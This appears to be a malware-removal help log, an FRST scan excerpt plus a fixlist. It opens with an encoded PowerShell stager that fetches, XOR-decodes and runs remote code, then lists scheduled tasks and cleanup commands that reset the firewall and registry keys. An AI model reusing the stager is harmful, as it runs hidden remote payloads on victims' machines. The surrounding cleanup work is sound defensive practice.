UwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA Task: {AD39A43D-3C0C-4490-B9C8-D06F8B9ED9F8} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {B96671E6-581C-4303-981E-F66DCAB39CAB} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe [2015-12-22] (Byte Technologies LLC) Task: {C975D91A-8036-44E1-8D3C-C309661C52F1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {CA67350E-59E6-4087-932B-A625223BDA72} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {D345DC32-914F-41A5-973E-5A7E57100779} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {D4A47CD2-5E92-452E-9A47-96BE37B4C7A6} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION Task: {E6F75A04-8958-4D3C-89C5-3E830CD3ED04} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION Task: {ECF20AD4-A3B7-4D84-9F5F-D10322ECB8F4} - System32\Tasks\UpdateTask => C:\Users\Larry\AppData\Local\{C2C3F~1\UNINST~1.EXE [2015-12-31] () Task: {F108C8F1-C7F7-4586-B249-13F1F5089957} - \One System Care Monitor -> No File <==== ATTENTION Task: {F515D6A9-EC73-47FB-AD16-EC4A94D69A60} - \One System Care Task -> No File <==== ATTENTION C:\Users\Larry\AppData\Local\{C2C3F~1 Task: C:\WINDOWS\Tasks\UpdateTask.job => cmd: ipconfig /flushdns cmd: netsh advfirewall reset cmd: netsh advfirewall set allprofiles state on Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F Reg: Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f CMD: bitsadmin /reset /allusers RemoveProxy: EmptyTemp: Reboot: end